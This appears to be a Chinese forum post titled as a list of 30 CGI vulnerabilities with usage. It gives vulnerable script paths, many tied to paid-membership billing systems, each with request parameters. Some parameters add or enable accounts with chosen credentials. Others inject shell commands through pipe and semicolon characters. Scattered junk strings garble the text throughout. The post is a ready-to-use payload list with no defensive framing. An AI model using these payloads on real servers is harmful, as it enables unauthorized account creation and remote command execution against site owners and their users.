Cgi-bin 30个漏洞＋使用方法

admin

==============================
0 c$ v( z# y4 b! N5 G
; L0 d6 I& }! R/ Y" M$ Z% x- a/smspass.pl
username=username&password=password
" h, m& @. s: a# W9 d
/index.cgi
wei=ren&gen=command
/ z- O4 V) F- j
/passmaster.cgi
Action=Add&Username=Username&Password=Password

/accountcreate.cgi
1 @0 Z2 K, r0 ^2 susername=username&password=password&ref1=|echo;ls|

/form.cgi
, t& G. e4 j/ h0 J# rname=xxxx&email=email&subject=xxxx&response=|echo;ls|

) n( Z# r  e2 `+ v/addusr.pl
, p, f- I% p% s' d+ Z6 A/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
( t6 F: d( h4 z' Q6 G
/ccbill-local.asp
; A. T4 f( Q5 \post_values=username:password
5 \5 D6 y. r8 B5 z. M6 K8 d
/count.cgi
pinfile=|echo;ls -la;exit|
5 U* I0 D9 e! o5 B: v' k" z" W" W" l
1 y/ L+ S$ T( W9 u; v0 a/recon.cgi
/recon.cgi?search
+ P  V* n; ?, p( Psearchoption=1&searchfor=|echo;ls -al;exit|
9 \- O% h' r! u( ]
" J( M7 v* T0 o1 L% B. p/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>

) X* {  \  D) m9 V) Y, f& ^$ n/af.cgi
_browser_out=|echo;ls -la;exit;|
0 a5 `" @( H  X; I3 D7 h4 {: [
/modify.cgi
: n! ?" L3 {. p* t+ U; r' w  Qusername=username&password=password&expire=30
; [3 N$ H9 f) V6 Q2 H$ u# ?4 w) }$ o
/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|
2 U# y- }& z; y1 e( O* F
/gx9passwd.cgi
cmd=ADD&user=username&pass=password
( ?0 T  i! k& Y# ?% N
/probecontrol.cgi
command=enable&username=username&password=password

- ]3 I5 G+ a! {- {/recon.cgi
! T# L3 ]9 O  G2 \* U( h  r1 D: Ysearchoption=3&searchfor=echo;ls -la;exit

/htadd.pl
5 e+ f+ {% L* E) p; \  oconfigfile=|echo; ls -alt; exit
) ]# W- @; J0 O) U5 X
/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/ibill*.pl
2 f* W6 T- }/ ]* F  Q  Mreqtype=add&authpwd=authpwd&username=username&password=password
  @- i2 \; [+ y3 v1 X
/cpay.cgi
% a3 T  q/ |4 |3 J" U. U3 Xcommand=add_member&username=username(EMAIL)&password=password(DES)

/globill_ut.cgi
do=add&username=username&password=password&wpassword=password
( C6 {( f+ o1 x. ~  ]. S
/ S- _  K9 l+ `5 |1 r/ U/usercontrol.cgi
command=enable&username=USER&password=PASS

9 g" A/ x" M2 h$ f& b) Q/globoSALErum.cgi
; x/ G  S! G# x* G; }9 @action=ADD&seccode=seccode&login=username&password=password

/addusr.pl
user=USER&pass=PASS&confirm=PASS
( [) E5 ~, u" I! H! ^( S9 }# f* n
- p4 g2 |# y6 v! q/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
) j, N: [! B0 \, Q) I1 }5 l) b9 s6 }pinfile=|echo;pwd;exit|

/accountcreate.cgi
. R9 r9 d2 |5 t  [7 h  E0 E/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit

& m1 F* h8 ~0 E/ ^2 m3 w/af.cgi
/env.cgi
ADD+;echo;pwd;exit
+ @8 z+ l- O6 [$ H" |" q; o
' D# m6 v' n7 c: Y6 f- V- M/count.cgi
pinfile=|echo;pwd;exit|
0 |, W" r7 M: n- x5 c
  ^% Q4 D5 U4 H& W/recon.cgi
" X3 ?7 f: T* @& m% a# ~7 csearchoption=1&searchfor=|echo;ls%20-al;exit|

/add.cgi
username=username&password=password&expire=30

3 K: W% T/ U  v% u==============================
4 |: q, v3 R  g. B% C3 M  m, L